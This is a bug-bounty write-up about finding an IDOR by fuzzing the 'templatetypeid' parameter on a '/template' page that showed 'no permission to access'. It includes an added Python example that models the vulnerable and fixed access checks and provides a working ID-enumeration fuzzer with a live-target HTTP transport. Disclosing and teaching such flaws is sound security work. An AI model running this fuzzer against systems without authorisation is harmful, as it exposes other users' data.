Get IDOR In No Permission To Access Page — Bug Bounty Tuesday


kerstan


Hello everyone, I’m Kerstan.

Today is Bug Bounty Tuesday, and I will share with you how I got an IDOR bug on a "no permission to access" page.

So, let’s dive right in.

Image generated with PaintingForYou

During the bug bounty process, I encountered a target. After an initial round of information gathering about the target, I was unable to find any exploitable areas.

So, I began testing the various features of the website. I registered an account and logged in with it to view the site’s content.

After repeatedly testing with Burp Suite’s Repeater, I discovered a module that couldn’t be accessed without permission.

I felt that it should be possible to attempt a breakthrough, so I checked the Burp data packets in detail, as follows:

Having identified the ‘templatetypeid’ parameter in the data packet, and noting that the current module’s path was ‘/template’, I decided to probe “/template?templatetypeid=fuzz”.

After fuzzing the parameter values, I was, as anticipated, able to access the webpage through an Insecure Direct Object Reference (IDOR). I then wrote up and reported this vulnerability.
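The probe described above, as an added example that is not the author’s code and not the real target: a constructed in-process model of a `/template?templatetypeid=N` endpoint whose permission check is a per-role blocklist of the one id the UI links to (so every other id falls through unchecked), the allowlist-on-the-object check that fixes it, and a small fuzzer of the kind you would point at such a page with a low-privilege session. The endpoint path and parameter name come from the write-up; the template data, session cookies, roles and the `http_request` transport (for use against a live target) are assumptions.

```python
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlparse

# Constructed sample data, not the target in the write-up. Only "admin" should
# be able to read template types 2 and 3.
TEMPLATES = {
    1: {"name": "Public newsletter", "roles": {"user", "admin"}},
    2: {"name": "Internal HR memo", "roles": {"admin"}},
    3: {"name": "Finance report", "roles": {"admin"}},
}
SESSIONS = {"sess-user": "user", "sess-admin": "admin"}

# Vulnerable check (hypothetical): the UI only ever links a plain user to id 2,
# so the developer gated that one id. Every other id falls through unchecked.
BLOCKED_FOR_ROLE = {"user": {2}}


def vulnerable_authorize(role, tid):
    return tid not in BLOCKED_FOR_ROLE.get(role, set())


def hardened_authorize(role, tid):
    # Allowlist on the object itself: unknown ids and unlisted roles are denied.
    tmpl = TEMPLATES.get(tid)
    return tmpl is not None and role in tmpl["roles"]


def handle_request(authorize, cookie, path):
    """In-process model of GET /template?templatetypeid=N. Returns (status, body)."""
    url = urlparse(path)
    if url.path != "/template":
        return 404, ""
    role = SESSIONS.get(cookie.replace("session=", ""))
    if role is None:
        return 401, ""
    try:
        tid = int(parse_qs(url.query).get("templatetypeid", ["0"])[0])
    except ValueError:
        return 400, ""
    if not authorize(role, tid):
        return 403, "No permission to access page"
    tmpl = TEMPLATES.get(tid)
    return (200, tmpl["name"]) if tmpl else (404, "")


def http_request(base_url):
    """Transport for a real target (assumed URL): same (status, body) shape via urllib."""
    def send(cookie, path):
        req = urllib.request.Request(base_url + path, headers={"Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, ""
    return send


def fuzz_templatetypeid(send, cookie, ids):
    """Probe each id with one low-privilege session; return {id: (status, body)}."""
    return {tid: send(cookie, f"/template?templatetypeid={tid}") for tid in ids}


def accessible_ids(results):
    """Ids that returned 200: the candidates to diff against the 403 baseline."""
    return sorted(tid for tid, (status, _) in results.items() if status == 200)


def run_demo(authorize, ids=range(0, 6)):
    send = lambda cookie, path: handle_request(authorize, cookie, path)
    return accessible_ids(fuzz_templatetypeid(send, "session=sess-user", ids))


if __name__ == "__main__":
    print("vulnerable:", run_demo(vulnerable_authorize))  # [1, 3]: id 3 leaks
    print("hardened:  ", run_demo(hardened_authorize))    # [1]
    # Against a live target you would swap the transport, e.g.
    # fuzz_templatetypeid(http_request("https://example.test"), "session=...", range(1, 200))
```

The fuzzer deliberately keeps status and body together: on a real target, a 200 on a "no permission" module is only a lead until you confirm the body is another principal’s data rather than an empty or error template, so diff the 200 bodies against the baseline 403 before you write the report.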

If this writing has been helpful to you, please consider giving it a clap and following. Thanks bro.

Alternatively, you can just buy me a coffee here; any sort of support is much appreciated. Enjoy your reading.

If you want to learn more about Bug Bounty Tuesday, please be sure to take a look at my latest articles.

How To Get A XSSI Bug In Bug Bounty — Bug Bounty Tuesday

Account Takeover on International Exchange — Bug Bounty Tuesday

URL Redirection To DOM XSS on Hackerone Programs — Bug Bounty Tuesday

How I Discovered SSRF on Hackerone Program

How I Automatically Discovered SSRF on Hackerone Program
